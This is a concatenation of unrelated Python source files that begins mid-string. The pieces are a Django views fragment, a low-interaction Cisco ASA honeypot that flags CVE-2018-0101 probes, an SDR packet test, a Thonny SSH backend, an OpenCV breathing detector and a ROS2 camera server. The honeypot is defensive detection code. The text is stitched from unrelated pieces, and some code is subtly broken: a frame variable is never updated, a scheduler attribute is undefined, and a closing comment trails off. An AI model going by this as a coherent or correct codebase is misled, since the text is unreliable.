**User Issue**
Email: {self.user.email}
User Agent: {get_user_agent(self.request)}
{description}
<details>
<summary>Redux state</summary>
<p>
```json
{json.dumps(state, indent=2)}
```
</p>
</details>
"""
r = requests.post(
'https://api.github.com/repos/alexmojaki/futurecoder/issues',
json={'title': title,
'body': body,
'labels': ['user', 'bug']},
headers=dict(
Authorization='token ' + settings.GITHUB_TOKEN,
),
)
assert r.status_code == 201
class FrontendAppView(LoginRequiredMixin, View):
"""
Serves the compiled frontend entry point (only works if you have run `yarn
run build`).
"""
def get(self, _request):
try:
with open(Path(__file__).parent / "../../frontend/build/index.html") as f:
return HttpResponse(f.read())
except FileNotFoundError:
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
)
class HomePageView(SuccessMessageMixin, CreateView):
template_name = "home.html"
success_message = "Success! We will email %(email)s when the time is right..."
def get_success_url(self):
return self.request.path_info
class form_class(ModelForm, PlaceHolderForm):
helper_attrs = dict(form_tag=False)
class Meta:
model = ListEmail
fields = ["email"]
def timeout_view(request):
sleep(35)
def fix_birdseye_server():
views = birdseye.server.app.view_functions
birdseye.server.app.view_functions = {
"call_view": views["ipython_call_view"],
"static": views["static"],
}
fix_birdseye_server()
|
asa_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
from io import BytesIO
from xml.etree import ElementTree
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler
import ike_server
import datetime
import json
class NonBlockingHTTPServer(ThreadingMixIn, HTTPServer):
pass
class hpflogger:
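    # Thin helper that publishes JSON event dicts to an hpfeeds channel.
    # It only connects when all broker parameters are supplied; otherwise
    # log() is a no-op.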
def __init__(self, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose):
self.hpfserver=hpfserver
self.hpfport=hpfport
self.hpfident=hpfident
self.hpfsecret=hpfsecret
self.hpfchannel=hpfchannel
self.serverid=serverid
self.hpc=None
self.verbose=verbose
        if (self.hpfserver and self.hpfport and self.hpfident and self.hpfsecret and self.hpfchannel and self.serverid):
import hpfeeds
try:
self.hpc = hpfeeds.new(self.hpfserver, self.hpfport, self.hpfident, self.hpfsecret)
logger.debug("Logging to hpfeeds using server: {0}, channel {1}.".format(self.hpfserver, self.hpfchannel))
except (hpfeeds.FeedException, socket.error, hpfeeds.Disconnect):
logger.critical("hpfeeds connection not successful")
def log(self, level, message):
if self.hpc:
if level in ['debug', 'info'] and not self.verbose:
return
message['serverid']= self.serverid
self.hpc.publish(self.hpfchannel, json.dumps(message))
def header_split(h):
return [list(map(str.strip, l.split(': ', 1))) for l in h.strip().splitlines()]
class WebLogicHandler(SimpleHTTPRequestHandler):
logger = None
hpfl = None
data = None
timestamp=None
req_classification = "request"
vulnerability = None
payload=None
req_category="info"
protocol_version = "HTTP/1.1"
EXPLOIT_STRING = b"host-scan-reply"
RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">9.0(1)</version>
<error id="98" param1="" param2="">VPN Server could not parse request.</error>
</config-auth>"""
basepath = os.path.dirname(os.path.abspath(__file__))
alert_function = None
def setup(self):
SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(3)
def send_header(self, keyword, value):
if keyword.lower() == 'server':
return
SimpleHTTPRequestHandler.send_header(self, keyword, value)
def send_head(self):
# send_head will return a file object that do_HEAD/GET will use
# do_GET/HEAD are already implemented by SimpleHTTPRequestHandler
filename = os.path.basename(self.path.rstrip('/').split('?', 1)[0])
if self.path == '/':
self.send_response(200)
for k, v in header_split("""
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; path=/; secure
Set-Cookie: sdesktop=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
"""):
self.send_header(k, v)
self.end_headers()
return BytesIO(b'<html><script>document.location.replace("/+CSCOE+/logon.html")</script></html>\n')
elif filename == 'asa': # don't allow dir listing
return self.send_file('wrong_url.html', 403)
else:
return self.send_file(filename)
def redirect(self, loc):
self.send_response(302)
for k, v in header_split("""
Content-Type: text/html
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Location: %s
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
""" % (loc,)):
self.send_header(k, v)
self.end_headers()
def do_GET(self):
if self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.startswith('/+CSCOE+/logon.html?') and 'reason=1' in self.path:
self.wfile.write(self.send_file('logon_failure').getvalue())
return
SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
data_len = int(self.headers.get('Content-length', 0))
self.data = self.rfile.read(data_len) if data_len else b''
body = self.RESPONSE
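        # CVE-2018-0101 probes carry an XML body containing one or more
        # <host-scan-reply> elements; their text is collected as the exploit
        # payload and reported through alert_function.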
if self.EXPLOIT_STRING in self.data:
xml = ElementTree.fromstring(self.data)
payloads = []
for x in xml.iter('host-scan-reply'):
payloads.append(x.text)
self.alert_function(self.client_address[0], self.client_address[1], self.connection.getsockname()[0], self.connection.getsockname()[1], payloads)
self.req_classification= "exploit"
self.vulnerability = "CVE-2018-0101"
self.payload=payloads
self.req_category="critical"
elif self.path == '/':
self.redirect('/+webvpn+/index.html')
return
elif self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.split('?', 1)[0] == '/+webvpn+/index.html':
with open(os.path.join(self.basepath, 'asa', "logon_redir.html"), 'rb') as fh:
body = fh.read()
self.send_response(200)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(body)
return
def send_file(self, filename, status_code=200, headers=[]):
try:
with open(os.path.join(self.basepath, 'asa', filename), 'rb') as fh:
body = fh.read()
self.send_response(status_code)
for k, v in headers:
self.send_header(k, v)
if status_code == 200:
for k, v in header_split("""
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; secure
X-Transcend-Version: 1
"""):
self.send_header(k, v)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
return BytesIO(body)
except IOError:
return self.send_file('wrong_url.html', 404)
def log_message(self, format, *args):
postdata=None
if self.data:
postdata=self.data.decode("utf-8")
self.logger.debug("%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
# hpfeeds logging with more information
rheaders = {}
for k,v in self.headers._headers:
rheaders[k] = v
self.hpfl.log(self.req_category, {
'classification': self.req_classification,
'timestamp': self.timestamp,
'vulnerability': self.vulnerability,
'src_ip': self.client_address[0],
'src_port': self.client_address[1],
'dest_ip': self.connection.getsockname()[0],
'dest_port': self.connection.getsockname()[1],
'raw_requestline': self.raw_requestline.decode("utf-8"),
'header': rheaders,
'postdata': postdata,
'exploitpayload': self.payload
})
def handle_one_request(self):
"""Handle a single HTTP request.
        Overridden to not send 501 errors.
"""
self.timestamp=datetime.datetime.now().isoformat()
self.close_connection = True
try:
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.close_connection = 1
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
# An error code has been sent, just exit
return
mname = 'do_' + self.command
if not hasattr(self, mname):
self.log_request()
self.close_connection = True
return
method = getattr(self, mname)
method()
self.wfile.flush() # actually send the response if not already done.
except socket.timeout as e:
# a read or a write timed out. Discard this connection
self.log_error("Request timed out: %r", e)
self.close_connection = 1
return
if __name__ == '__main__':
import click
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.info('info')
@click.command()
@click.option('-h', '--host', default='0.0.0.0', help='Host to listen')
@click.option('-p', '--port', default=8443, help='Port to listen', type=click.INT)
@click.option('-i', '--ike-port', default=5000, help='Port to listen for IKE', type=click.INT)
@click.option('-s', '--enable_ssl', default=False, help='Enable SSL', is_flag=True)
@click.option('-c', '--cert', default=None, help='Certificate File Path (will generate self signed '
'cert if not supplied)')
@click.option('-v', '--verbose', default=False, help='Verbose logging', is_flag=True)
# hpfeeds options
@click.option('--hpfserver', default=os.environ.get('HPFEEDS_SERVER'), help='HPFeeds Server')
@click.option('--hpfport', default=os.environ.get('HPFEEDS_PORT'), help='HPFeeds Port', type=click.INT)
@click.option('--hpfident', default=os.environ.get('HPFEEDS_IDENT'), help='HPFeeds Ident')
@click.option('--hpfsecret', default=os.environ.get('HPFEEDS_SECRET'), help='HPFeeds Secret')
@click.option('--hpfchannel', default=os.environ.get('HPFEEDS_CHANNEL'), help='HPFeeds Channel')
@click.option('--serverid', default=os.environ.get('SERVERID'), help='ServerID/ServerName')
def start(host, port, ike_port, enable_ssl, cert, verbose, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid):
"""
A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101,
a DoS and remote code execution vulnerability
"""
hpfl=hpflogger(hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose)
def alert(cls, host, port, localip, localport, payloads):
logger.critical({
'src_ip': host,
'src_port': port,
'dest_ip': localip,
'dest_port': localport,
'exploitdata': payloads
})
if verbose:
logger.setLevel(logging.DEBUG)
requestHandler = WebLogicHandler
requestHandler.alert_function = alert
requestHandler.logger = logger
requestHandler.hpfl = hpfl
def log_date_time_string():
"""Return the current time formatted for logging."""
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
s = "%02d/%3s/%04d %02d:%02d:%02d" % (day, requestHandler.monthname[month], year, hh, mm, ss)
return s
def ike():
ike_server.start(host, ike_port, alert, logger, hpfl)
t = threading.Thread(target=ike)
t.daemon = True
t.start()
httpd = HTTPServer((host, port), requestHandler)
if enable_ssl:
import ssl
if not cert:
import gencert
cert = gencert.gencert()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
logger.info('Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
logger.info('Stopping server.')
httpd.server_close()
start()
|
create_and_receive_packets.py
|
# Copyright: (c) 2021, Edwin G. W. Peters
import sys
import threading
import time
sys.path.append('../zmq_listeners')
from zmq_send_tx_to_sdr import send_to_sdr
from zmq_recv_sdr_UHF_data import Rx_uhf_from_sdr
from zmq_recv_sdr_SBAND_data import Rx_sband_from_sdr
NUM_PACKETS = 10
TIME_BETWEEN_PACKETS_MS = 1000  # milliseconds
tx_t = threading.Thread(target = send_to_sdr,kwargs={'NUM_TESTS' :NUM_PACKETS, 'TIME_BETWEEN_PACKETS_MS' : TIME_BETWEEN_PACKETS_MS})
rx_uhf_cls = Rx_uhf_from_sdr()
rx_uhf_t = threading.Thread(target = rx_uhf_cls.rx_uhf_from_sdr)
rx_sband_cls = Rx_sband_from_sdr()
rx_sband_t = threading.Thread(target = rx_sband_cls.rx_sband_from_sdr)
rx_cls_all = [rx_uhf_cls,rx_sband_cls]
rx_threads = [rx_uhf_t]
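# NOTE: only the UHF receive thread is added to rx_threads and started below;
# the S-band receiver object is created (and later terminated) but its thread
# is never started here.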
threads = [tx_t] + rx_threads
for t in threads:
t.start()
# while tx_t.is_alive:
# time.sleep(1)
tx_t.join()
print('tx finished')
time.sleep(1)
for c in rx_cls_all:
c.terminate()
for t in rx_threads:
t.join()
|
cps_back.py
|
"""Intermediate process for communicating with the remote Python via SSH"""
import ast
import os.path
import sys
import threading
from logging import getLogger
from threading import Thread
import thonny
from thonny.backend import (
BaseBackend,
RemoteProcess,
SshMixin,
ensure_posix_directory,
interrupt_local_process,
)
from thonny.common import (
CommandToBackend,
EOFCommand,
ImmediateCommand,
InputSubmission,
MessageFromBackend,
serialize_message,
)
logger = getLogger(__name__)
class SshCPythonBackend(BaseBackend, SshMixin):
def __init__(self, host, user, interpreter, cwd):
logger.info("Starting mediator for %s @ %s", user, host)
password = sys.stdin.readline().strip("\r\n")
SshMixin.__init__(self, host, user, password, interpreter, cwd)
self._upload_main_backend()
self._proc = self._start_main_backend()
self._main_backend_is_fresh = True
self._response_lock = threading.Lock()
self._start_response_forwarder()
BaseBackend.__init__(self)
def _handle_eof_command(self, msg: EOFCommand) -> None:
self._forward_incoming_command(msg)
def _handle_user_input(self, msg: InputSubmission) -> None:
self._forward_incoming_command(msg)
def _handle_normal_command(self, cmd: CommandToBackend) -> None:
if cmd.name[0].isupper():
if "expected_cwd" in cmd:
self._cwd = cmd["expected_cwd"]
self._restart_main_backend()
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is not None:
# SFTP methods defined in SshMixin
try:
response = handler(cmd)
except Exception as e:
response = {"error": str(e)} # TODO:
self.send_message(self._prepare_command_response(response, cmd))
else:
# other methods running in the remote process
self._forward_incoming_command(cmd)
def _handle_immediate_command(self, cmd: ImmediateCommand) -> None:
SshMixin._handle_immediate_command(self, cmd)
# It is possible that there is a command being executed both in the local and remote process,
# interrupt them both
with self._interrupt_lock:
interrupt_local_process()
self._proc.stdin.write("\x03")
def send_message(self, msg: MessageFromBackend) -> None:
with self._response_lock:
super().send_message(msg)
def _forward_incoming_command(self, msg):
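        # Serialize the command and stream it to the remote backend's stdin
        # line by line, then write a terminating newline.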
msg_str = serialize_message(msg, 1024)
for line in msg_str.splitlines(keepends=True):
self._proc.stdin.write(line)
self._proc.stdin.flush()
self._proc.stdin.write("\n")
def _start_response_forwarder(self):
self._response_forwarder = Thread(target=self._forward_main_responses, daemon=True)
self._response_forwarder.start()
def _forward_main_responses(self):
while self._check_for_connection_error():
line = self._proc.stdout.readline()
if self._main_backend_is_fresh and self._looks_like_echo(line):
# In the beginning the backend may echo commands sent to it (perhaps this echo-avoiding trick
# takes time). Don't forward those lines.
continue
if not line:
break
with self._response_lock:
sys.stdout.write(line)
sys.stdout.flush()
self._main_backend_is_fresh = False
def _looks_like_echo(self, line):
return line.startswith("^B")
    def _check_for_connection_error(self) -> bool:
        # raises if the remote process has died; returns True so the
        # response forwarder loop keeps polling
        if self._proc is None or self._proc.poll() is not None:
            raise ConnectionAbortedError()
        return True
def _start_main_backend(self) -> RemoteProcess:
env = {"THONNY_USER_DIR": "~/.config/Thonny", "THONNY_FRONTEND_SYS_PATH": "[]"}
self._main_backend_is_fresh = True
args = [
self._target_interpreter,
"-m",
"thonny.plugins.cpython_backend.cp_launcher",
self._cwd,
]
logger.info("Starting remote process: %r", args)
return self._create_remote_process(
args,
cwd=self._get_remote_program_directory(),
env=env,
)
def _restart_main_backend(self):
self._proc.kill()
self._proc = None
self._response_forwarder.join()
self._proc = self._start_main_backend()
self._start_response_forwarder()
def _get_remote_program_directory(self):
return f"/tmp/thonny-backend-{thonny.get_version()}-{self._user}"
def _upload_main_backend(self):
import thonny
launch_dir = self._get_remote_program_directory()
if self._get_stat_mode_for_upload(launch_dir) and not thonny.get_version().endswith("-dev"):
# don't overwrite unless in dev mode
return
ensure_posix_directory(
launch_dir + "/thonny/plugins/cpython_backend",
self._get_stat_mode_for_upload,
self._mkdir_for_upload,
)
import thonny.ast_utils
import thonny.backend
import thonny.jedi_utils
import thonny.plugins.cpython_backend.cp_back
# Don't want to import cp_back_launcher and cp_tracers
local_context = os.path.dirname(os.path.dirname(thonny.__file__))
for local_path in [
thonny.__file__,
thonny.common.__file__,
thonny.ast_utils.__file__,
thonny.jedi_utils.__file__,
thonny.backend.__file__,
thonny.plugins.cpython_backend.__file__,
thonny.plugins.cpython_backend.cp_back.__file__,
thonny.plugins.cpython_backend.cp_back.__file__.replace("cp_back.py", "cp_launcher.py"),
thonny.plugins.cpython_backend.cp_back.__file__.replace("cp_back.py", "cp_tracers.py"),
]:
local_suffix = local_path[len(local_context) :]
remote_path = launch_dir + local_suffix.replace("\\", "/")
logger.info("Uploading %s => %s", local_path, remote_path)
self._perform_sftp_operation_with_retry(lambda sftp: sftp.put(local_path, remote_path))
if __name__ == "__main__":
thonny.configure_backend_logging()
args = ast.literal_eval(sys.argv[1])
backend = SshCPythonBackend(**args)
backend.mainloop()
|
FD_BS_m_circles.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import math
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
fgbg = cv2.createBackgroundSubtractorMOG2()
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
red = 30
check_red = 1
start = 0
radiuce_up_limit =60
radiuce_low_limit = 30
    # defaults so the fallback drawing branch below cannot hit a NameError before the first detection
    cX1 = cY1 = cX2 = cY2 = 0
    i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
        # frame differencing
frame_diff = cv2.absdiff(current_frame,copy_frame)
ret ,binary_image1 = cv2.threshold(frame_diff,3,255,cv2.THRESH_BINARY)
# Background Subtraction
binary_image3 = fgbg.apply(current_frame)
# combination of two methods
final_binary = cv2.bitwise_and(binary_image3,binary_image1)
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(final_binary, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red +10
if red > radiuce_up_limit:
check_red =0
else:
red = red -10
if red == radiuce_low_limit:
check_red =1
if lab_stats[1:, 4].size > 2:
re = lab_stats[1:, 4].argsort()[-2:][::-1] + 1
largest_mask = np.zeros(final_binary.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
            cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
            # imutils.grab_contours copes with the different return shapes of OpenCV 2/3/4
            cnts1 = imutils.grab_contours(cnts1)
            largest_mask[img_labeled == re[1]] = lab_val
            cnts2 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
            cnts2 = imutils.grab_contours(cnts2)
if len(cnts2) > 1:
X1 = cnts2[0][0]
X2 = cnts2[1][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cX2 = X2[0][0]
cY2 = X2[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.circle(frame, (cX2, cY2), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
previous_frame = current_frame
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
#
#
#
|
server.py
|
import rclpy
from rclpy.node import Node
import threading
from threading import Lock
import uuid
import camera.overlay_lib as overlay_lib
# import board
from std_msgs.msg import String
from std_msgs.msg import Int32MultiArray, Int16
from sensor_msgs.msg import Joy, Imu, FluidPressure, Temperature
import argparse
import cv2
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from .camera import Camera
from .log import logger
from .debounce import ButtonHandler
URL_PATH_MJPG = "/camera.mjpg"
URL_PATH_FAVICON = "/favicon.ico"
SLEEP_IN_SEC = 0.050
x = 0
y = 0
display_config = 0
power_info = "N/A"
CPU_info = "N/A"
euler = [0.0, 0.0, 0.0]
temp = "N/A"
alt = "N/A"
diff_fps = 1
flash_message = ""
take_snapshot = False
class CameraHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.document_root = server.get_document_root()
self.camera = server.get_camera()
# https://www.tutorialkart.com/opencv/python/opencv-python-get-image-size/
self.frame_shape = self.camera.get_frame(SLEEP_IN_SEC).shape
super(CameraHandler, self).__init__(request, client_address, server)
def flash_message(self, text, frame, pos_x=int(200), pos_y=int(20), duration=3):
# self.camera.print_text(frame, pos_x, pos_y, text)
# parse x:self.camera = camera
thickness = 0
font = 0
font_size = 0.3
font_color = [255, 255, 0]
font_thickness = 1
cv2.putText(
frame,
str(text),
(int(pos_x), int(pos_y)),
font,
font_size,
font_color,
font_thickness,
cv2.LINE_AA,
)
self.clear_text(duration)
    def c_text(self):
        global flash_message
        flash_message = ""
def clear_text(self, duration=3):
self.scheduler.add_job(
self.c_text,
"interval",
seconds=int(duration),
id="clear_text",
replace_existing=True,
)
def save_snapshot(self, im):
# save snapshot when button is pressed down
file_path = "snapshots/" + str(uuid.uuid1()) + ".jpg"
# write snapshot to file (we use image value instead of camera because it's already in JPEG format)
with open(file_path, "wb") as f:
f.write(im)
def do_GET(self):
if self.path == URL_PATH_MJPG:
self.send_response(200)
self.send_header(
"Content-type", "multipart/x-mixed-replace; boundary=--jpgboundary"
)
self.end_headers()
while self.camera.is_opened():
global diff_fps, flash_message, take_snapshot
start_fps = time.time()
frame = self.camera.get_frame(SLEEP_IN_SEC)
# Does not work
if display_config == 0:
# Debug drawing to see which display config is active
overlay_lib.draw_text(
frame,
100,
100,
"d: " + str(display_config),
self.frame_shape[1],
self.frame_shape[0],
)
overlay_lib.drawCrosshair(
frame, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_joy(
frame, x, y, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_power(
frame, power_info, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_CPU(
frame, CPU_info, self.frame_shape[1], self.frame_shape[0]
)
overlay_lib.draw_FPS(
frame,
"FPS: " + str(int(1 / float(diff_fps))),
self.frame_shape[1],
self.frame_shape[0],
)
overlay_lib.draw_IMU(
frame,
euler,
temp,
alt,
self.frame_shape[1],
self.frame_shape[0],
)
# self.camera.draw_power2(frame, "AAA")
elif display_config == 1:
overlay_lib.drawCrosshair(
frame, self.frame_shape[1], self.frame_shape[0]
)
elif display_config == 2:
continue
ret, jpg = cv2.imencode(".jpg", frame)
if take_snapshot:
self.save_snapshot(jpg)
take_snapshot = False
# jpg = self.camera.read_in_jpeg(SLEEP_IN_SEC, 1 / diff_fps)
if jpg is None:
continue
self.wfile.write("--jpgboundary".encode())
self.send_header("Content-type", "image/jpeg")
self.send_header("Content-length", str(jpg.nbytes))
self.end_headers()
self.wfile.write(jpg)
endtime_fps = time.time()
diff_fps = endtime_fps - start_fps
elif self.path == URL_PATH_FAVICON:
self.send_response(404)
self.end_headers()
self.wfile.write("favicon is not found".encode())
else:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
with open(self.document_root + "/index.html", "r") as f:
self.wfile.write(f.read().encode())
logger.info("thread is stopping ... [{path}]".format(path=self.path))
class ButtonH(threading.Thread):
    def __init__(self, pin, func, bouncetime=500):
        super().__init__(daemon=True)
        self.func = func
        self.pin = pin
        # __call__ relies on self.bouncetime, which was never set in the original
        self.bouncetime = float(bouncetime) / 1000
        self.lastpinval = self.pin
        self.lock = threading.Lock()
    def __call__(self, *args):
        if not self.lock.acquire(blocking=False):
            return
        t = threading.Timer(self.bouncetime, self.read, args=args)
        t.start()
        print(self.pin)
def read(self, *args):
print(self.pin)
# pinval = self.pin
# print(self.pin)
# if (
# (pinval == 0 and self.lastpinval == 1)
# and (self.edge in ["falling", "both"])
# ) or (
# (pinval == 1 and self.lastpinval == 0) and (self.edge in ["rising", "both"])
# ):
# print(self.pin)
#
# # self.func(*args)
#
# self.lastpinval = pinval
# self.lock.release()
class ButtonHandler(threading.Thread):
def __init__(self, pin, func, edge="both", bouncetime=500):
super().__init__(daemon=True)
self.edge = edge
self.func = func
self.pin = pin
self.bouncetime = float(bouncetime) / 1000
self.lastpinval = self.pin
self.lock = threading.Lock()
def __call__(self, *args):
if not self.lock.acquire(blocking=False):
return
print("Call")
t = threading.Timer(self.bouncetime, self.read, args=args)
t.start()
def read(self, *args):
pinval = self.pin
print(self.pin)
if (
(pinval == 0 and self.lastpinval == 1)
and (self.edge in ["falling", "both"])
) or (
(pinval == 1 and self.lastpinval == 0) and (self.edge in ["rising", "both"])
):
print(self.pin)
# self.func(*args)
self.lastpinval = pinval
self.lock.release()
class Robot_Info(Node):
def __init__(self):
super().__init__("robot_info")
self.joy_topic = self.create_subscription(Joy, "joy", self.joy_topic, 10)
# self.move_topic = self.create_subscription(String, "in", self.joy_topic, 10)
self.CPU_topic = self.create_subscription(
String, "info_sys_CPU", self.CPU_topic, 10
)
self.power_topic = self.create_subscription(
String, "info_sys_power", self.power_topic, 10
)
self.imu_topic = self.create_subscription(Imu, "/imu", self.imu_topic, 10)
self.temp_topic = self.create_subscription(
Temperature, "/temp", self.temp_topic, 10
)
self.press_topic = self.create_subscription(
FluidPressure, "/press", self.press_topic, 10
)
self.init_buttons = True
def imu_topic(self, msg):
global euler
euler = euler_from_quaternion(
msg.orientation.x,
msg.orientation.y,
msg.orientation.z,
msg.orientation.w,
False,
1,
)
def temp_topic(self, msg):
global temp
temp = round(msg.temperature, 1)
def press_topic(self, msg):
global alt
alt = int(get_altitude(msg.fluid_pressure))
def power_topic(self, msg):
global power_info
power_info = msg.data
def CPU_topic(self, msg):
global CPU_info
CPU_info = msg.data
def take_snapshot(self, argum="N/A"):
global take_snapshot
take_snapshot = True
# print("SNAP!!!!" + str(argum))
def change_view(self):
global display_config
print(display_config)
if display_config >= 3:
display_config = 0
else:
display_config += 1
def joy_topic(self, msg):
global x, y, display_config
x = round(msg.axes[0], 1)
y = round(msg.axes[1], 1)
display_change_button = msg.buttons[9]
if display_change_button == 1:
self.change_view()
# if self.display_config >= 3:
# self.display_config = 0
# else:
# self.display_config += 1
# if self.init_buttons == True:
# # self.cb = ButtonHandler(msg.buttons[5], self.take_snapshot, ["kmkmkm"])
# self.init_buttons = False
# if self.init_buttons == False:
# try:
# self.cb.read(msg.buttons[5])
# except Exception:
# print("ERROR: " + str(Exception))
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
def set_camera(self, camera):
self.camera = camera
def get_camera(self):
return self.camera
def set_document_root(self, document_root):
self.document_root = document_root
def get_document_root(self):
return self.document_root
# Probably better to define either a message or a common library
import subprocess
def get_ip_address(interface):
cmd = (
"ifconfig %s | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'"
% interface
)
return subprocess.check_output(cmd, shell=True).decode("ascii")[:-1]
import math
G_TO_MPSS = 9.80665
def get_altitude(pressure: float, sea_level_hPa: float = 1013.25) -> float:
"""
the conversion uses the formula:
h = (T0 / L0) * ((p / P0)**(-(R* * L0) / (g0 * M)) - 1)
where:
h = height above sea level
T0 = standard temperature at sea level = 288.15
L0 = standard temperatur elapse rate = -0.0065
p = measured pressure
P0 = static pressure = 1013.25
g0 = gravitational acceleration = 9.80665
M = mloecular mass of earth's air = 0.0289644
R* = universal gas constant = 8.31432
Given the constants, this works out to:
h = 44330.8 * (1 - (p / P0)**0.190263)
Arguments:
pressure {float} -- current pressure
sea_level_hPa {float} -- The current hPa at sea level.
Returns:
[type] -- [description]
"""
return 44330.8 * (1 - pow(pressure / sea_level_hPa, 0.190263))
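# Illustrative only -- not part of the original node: a tiny sanity check for the
# barometric shortcut above. Call it manually if you want to verify the constants.
def _altitude_selfcheck():
    # standard sea-level pressure should map to (almost exactly) 0 m
    assert abs(get_altitude(1013.25)) < 1e-6
    # roughly 898.75 hPa corresponds to about 1000 m above sea level
    assert 950 < get_altitude(898.75) < 1050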
def compute_sea_level(altitude: float, atmospheric: float) -> float:
"""
Calculates the pressure at sea level (in hPa) from the specified altitude
(in meters), and atmospheric pressure (in hPa).
# Equation taken from BMP180 datasheet (page 17):
# http://www.adafruit.com/datasheets/BST-BMP180-DS000-09.pdf
Args:
altitude : Altitude in meters
atmospheric : Atmospheric pressure in hPa
Return:
float The approximate pressure
"""
return atmospheric / pow(1.0 - (altitude / 44330.0), 5.255)
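# Illustrative only -- a sketch that is not in the original file: the two helpers above are
# approximately inverse to each other, which is a cheap way to catch a broken constant.
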